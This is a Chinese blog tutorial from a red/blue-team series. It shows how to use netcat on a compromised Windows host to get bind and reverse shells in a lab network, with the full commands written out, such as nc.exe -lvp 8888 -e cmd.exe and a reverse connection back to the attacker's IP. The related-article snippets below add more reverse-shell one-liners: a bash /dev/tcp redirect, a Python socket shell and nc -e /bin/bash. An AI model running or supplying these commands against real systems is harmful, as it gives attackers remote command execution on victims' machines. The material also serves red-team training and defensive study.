《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell

最新推荐文章于 2024-04-26 10:43:01 发布
最新推荐文章于 2024-04-26 10:43:01 发布
阅读量2.2w 收藏 2
点赞数
分类专栏: 红蓝攻防对抗实战指南 文章标签: windows 正向连接 反向连接 NC 流量监听 Shell反弹 红蓝攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46192679/article/details/133997465
版权

目录

一.利用NC工具在windows系统执行反弹shell

1. Windows正向连接shell

2.Windows反向连接shell

 前文推荐:

假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作,实验拓扑如图1-1所示。

一.利用NC工具在windows系统执行反弹shell

图1-1 windows系统下实验拓扑图

1. Windows正向连接shell

本次实验环境如图1-1所示,假设已经获取到目标服务器的系统权限,上传nc工具,使用正向连接反弹shell的方法将目标服务器的shell反弹到本地主机。

1)首先在目标服务器执行nc.exe -lvp 8888 -e cmd.exe命令监听8888端口,使用-e参数将cmd.exe程序反弹连接到此端口的服务,开启监听执行成功后如图1-2所示。

图1-2 服务器开启监听

2)目标服务器执行监听后,在本地主机执行nc.exe 192.168.0.3 8888命令去连接目标服务器nc开启监听的端口,连接成功即可获取到目标服务器的shell权限,如图1-3所示。

图1-3  windwos主机获取反弹shell

2.Windows反向连接shell

本次实验环境如图1-1所示,在目标服务器允许出网的情况下,在本地主机上获取到目标服务器的shell权限,可以尝试使用反向连接的方法。

1)首先在本地主机中使用nc工具开启监听,执行nc.exe -lvp 8888命令,如图1-4所示。

图1-4 windows主机开启服务端监听

2)当本地主机开启监听后,在目标服务器执行nc.exe 192.168.0.2 8888 -e cmd"命令主动连接本地主机的8888端口将cmd命令反弹到目标服务器,如图1-5所示

图1-5 服务器连接主机

3)此时当目标服务器访问我们的本地8888端口时,即可执行获取到目标服务器的Shell权限,使用Ipconfig命令查看获取到的反弹shell的IP,可查看到是目标服务器,如图1-6所示。

图1-6 获取服务器反弹shell的IP

一只特立独行的兔先森
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows/Linux 下nc 反弹shell
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
m0_47402792的博客
01-07 461
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
Windows反弹Shell
最新发布
qq_62073002的博客
04-26 835
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1431
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
简单易上手!Windows反弹shell实现
weixin_54475173的博客
01-02 448
Windows反弹shell
反弹shell的本质及实战
静水流深,沧笙踏歌
05-13 395
Linux反弹shell(一)文件描述符与重定向 Linux 反弹shell(二)反弹shell的本质 Linux下反弹shell几种方法学习总结
2021实战攻防企业红蓝对抗实践指南.pdf
07-01
2021实战攻防企业红蓝对抗实践指南
大型红蓝攻防实战系列全景图.pptx
03-29
红蓝攻防全景推演】是网络安全领域中一种模拟真实攻击与防御的演练方式,旨在提高组织的网络安全防御能力。这种推演涵盖了攻击面和暴露面的识别、边界突破与防护、横向渗透与区域控制、攻陷与强控等多个阶段,通过...
奇安信红蓝实战攻防演习手册.pdf
07-14
奇安信红蓝实战攻防演习手册
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
红蓝对抗专题资料.zip
04-21
红蓝对抗专题资料》是一份综合性的IT安全学习资源,涵盖了网络空间安全的重要领域,如资产测绘、资产暴露面管理、预测性防御、攻击压制与溯源、欺骗防御策略、大杀器检测、应急响应以及攻防实战演习的规划与实施。...
HW红蓝对抗:紫队视角下的实战攻防演习组织.zip
03-16
网络实战攻防演习,是新形势下关键信息系统网络安全保护工作的重要组成部分。 本手册重点介绍攻防实战环境下的紫队工作,提出组织实战攻防演习的四个阶段(组织策划、前期准备、实战攻防、演习总结),给出实战攻防...
红蓝攻防对抗实战》七.常规反弹利用NC在Linux系统执行反弹shell
热门推荐
一只特立独行的兔先森
10-24 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透。
NC反弹Shell
qq_23066945的博客
11-23 615
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
利用nc反弹shell
D1stiny的博客
05-18 480
正向shell:攻击机主动连接靶机 攻击机主动连接并得到反弹shell nc 靶机ip 53##因为防火墙的原因,通常不会成功 服务端监听连接 nc -lp 53 -e /bin/sh ##-lp就是-l,-p写在一起 nc -lp 53 -e c:\windows\system32\cmd.exe ##windows 反向shell:靶机连接攻击机(靶机运行了攻击机制作的后门程序) 攻击机监听 nc -lp 53 ##通常选用80,53等常用端口,防止连接失败 靶机连接攻击机 nc 攻击机ip
反弹shell的方法和场景
weixin_45653478的博客
04-01 1302
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
记一次nc反弹shell
^_^
11-30 535
在kali虚拟机上用nc监听端口7777 nc -lvp 7777 在ubuntu虚拟机上用python脚本去反向连接 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('?.?.?.?',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subproce
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值